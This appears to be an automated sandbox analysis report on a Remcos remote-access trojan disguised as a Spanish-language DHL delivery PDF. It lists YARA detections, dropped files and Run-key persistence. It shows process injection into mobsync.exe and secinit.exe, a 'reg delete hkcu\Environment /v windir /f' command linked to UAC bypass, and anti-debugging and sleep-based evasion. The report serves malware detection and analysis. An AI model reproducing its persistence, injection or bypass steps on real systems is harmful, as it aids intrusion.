              Source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: C:\Users\Public\Libraries\ocnezqI.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00412598 ExitWindowsEx,LoadLibraryA,GetProcAddress,22_2_00412598
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042E02D5_2_0042E02D
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004330D15_2_004330D1
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0043424F5_2_0043424F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042220F5_2_0042220F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0041A3F85_2_0041A3F8
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042E02D22_2_0042E02D
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004330D122_2_004330D1
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0043424F22_2_0043424F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042220F22_2_0042220F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0041A3F822_2_0041A3F8
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004304DB22_2_004304DB
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0044C56A22_2_0044C56A
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004335CD22_2_004335CD
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0043E6E022_2_0043E6E0
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0044A72522_2_0044A725
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004378EC22_2_004378EC
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004228AD22_2_004228AD
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004339E522_2_004339E5
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004229F022_2_004229F0
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 0042EDF6 appears 64 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 00402064 appears 87 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 0042F460 appears 43 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 004165D8 appears 37 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 004020B5 appears 31 times
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 00404818 appears 31 times
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Iqzenco.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: Iqzenco.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeVirustotal: Detection: 26%
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeReversingLabs: Detection: 24%
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile read: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe 'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe'
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
              Source: unknownProcess created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' 'Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' 'Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.batJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /fJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004132F7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_004132F7
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004132F7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,22_2_004132F7
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Iqzencolmjnhoxprppdkgkfyidrxfas[1]Jump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/10@49/2
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0040D1AD GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CreateMutexA,CloseHandle,5_2_0040D1AD
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
              Source: C:\Windows\SysWOW64\mobsync.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-8VTGWT
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_01
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040D41E FindResourceA,LoadResource,LockResource,SizeofResource,22_2_0040D41E
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00458435 push esi; ret 22_2_0045843E
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042F4A6 push ecx; ret 22_2_0042F4B9
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00450918 push eax; ret 22_2_00450936
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: .....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: .....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ....
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: ......
              Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeStatic PE information: section name: .....
              Source: Iqzenco.exe.0.drStatic PE information: section name: .....
              Source: Iqzenco.exe.0.drStatic PE information: section name: ......
              Source: Iqzenco.exe.0.drStatic PE information: section name: .....
              Source: Iqzenco.exe.0.drStatic PE information: section name: ....
              Source: Iqzenco.exe.0.drStatic PE information: section name: ......
              Source: Iqzenco.exe.0.drStatic PE information: section name: ....
              Source: Iqzenco.exe.0.drStatic PE information: section name: ......
              Source: Iqzenco.exe.0.drStatic PE information: section name: ......
              Source: Iqzenco.exe.0.drStatic PE information: section name: .....
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0040D072
              Source: initial sampleStatic PE information: section where entry point is pointing to: ......
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exe
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: \entrega de documentos dhl _ 27-09-21,pdf.exeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeFile created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeJump to dropped file
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IqzencoJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IqzencoJump to behavior

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon4828.png
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0040D072
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Delayed program exit foundShow sources
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0040D455 Sleep,ExitProcess,5_2_0040D455
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040D455 Sleep,ExitProcess,22_2_0040D455
              Source: C:\Windows\SysWOW64\mobsync.exe TID: 3628Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exe TID: 3880Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\secinit.exe TID: 2388Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\mobsync.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\secinit.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,5_2_004170AC
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00406176 FindFirstFileW,FindNextFileW,5_2_00406176
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,22_2_004170AC
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00406176 FindFirstFileW,FindNextFileW,22_2_00406176
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,22_2_0040A3AF
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,22_2_0040A5CA
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004456A9 FindFirstFileExA,22_2_004456A9
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,22_2_004077EE
              Source: C:\Windows\SysWOW64\mobsync.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\secinit.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,22_2_00406930
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0042F07F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0040D072
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0044697D GetProcessHeap,22_2_0044697D
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0043B789 mov eax, dword ptr fs:[00000030h]22_2_0043B789
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042F1CD SetUnhandledExceptionFilter,5_2_0042F1CD
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0042F07F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004360A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_004360A3
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042F1CD SetUnhandledExceptionFilter,22_2_0042F1CD
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0042F07F
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_004360A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_004360A3
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0042F62C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_0042F62C

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2C60000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2C70000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2C80000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D10000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D20000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D30000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D40000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D50000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D60000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D70000Jump to behavior
